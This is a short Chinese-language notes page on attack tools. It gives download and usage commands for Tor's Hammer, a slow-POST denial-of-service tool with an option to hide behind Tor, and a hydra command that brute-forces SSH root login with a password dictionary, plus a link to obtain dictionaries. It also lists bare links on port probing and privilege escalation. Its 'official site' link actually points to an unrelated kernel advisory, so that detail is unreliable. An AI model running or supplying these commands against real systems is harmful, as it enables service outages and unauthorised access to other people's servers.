仿DDoS攻击工具
http://netsecurity.51cto.com/art/201406/442756.htm
个人测试使用的是:Tor's hammer,官方网站:https://packetstormsecurity.com/files/145109/Linux-mincore-Kernel-Heap-Page-Disclosure.html。
操作很简单,下载之后解压就可以直接使用:
# mkdir tor_syn_test
# cd tor_syn_test
# wget https://dl.packetstormsecurity.net/DoS/torshammer.tgz
# tar zxf torshammer.tgz
# ls
socks.py socks.pyc terminal.py terminal.pyc torshammer.py torshammer.tgz
使用说明:
# ./torshammer.py -h
/*
* Tor's Hammer
* Slow POST DoS Testing Tool
* entropy [at] phiral.net
* Anon-ymized via Tor
* We are Legion.
*/
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
-t|--target <Hostname|IP>
-r|--threads <Number of threads> Defaults to 256
-p|--port <Web Server Port> Defaults to 80
-T|--tor Enable anonymising through tor on 127.0.0.1:9050
-h|--help Shows this help
Eg. ./torshammer.py -t 192.168.1.100 -r 256
端口触探
http://blog.csdn.net/lee244868149/article/details/39177755
暴力破解工具hydra
http://blog.csdn.net/yafeichang/article/details/53502869
//ssh登录破解示例:
# hydra -l root -P rkolin2.txt 192.168.123.123 ssh
//rkolin2.txt为提前准备的密码字典
说明:密码字典需要自己准备,推荐 https://pan.baidu.com/s/1jGiVsMi#list/path=%2F
系统提权
http://blog.csdn.net/bnxf00000/article/details/64906539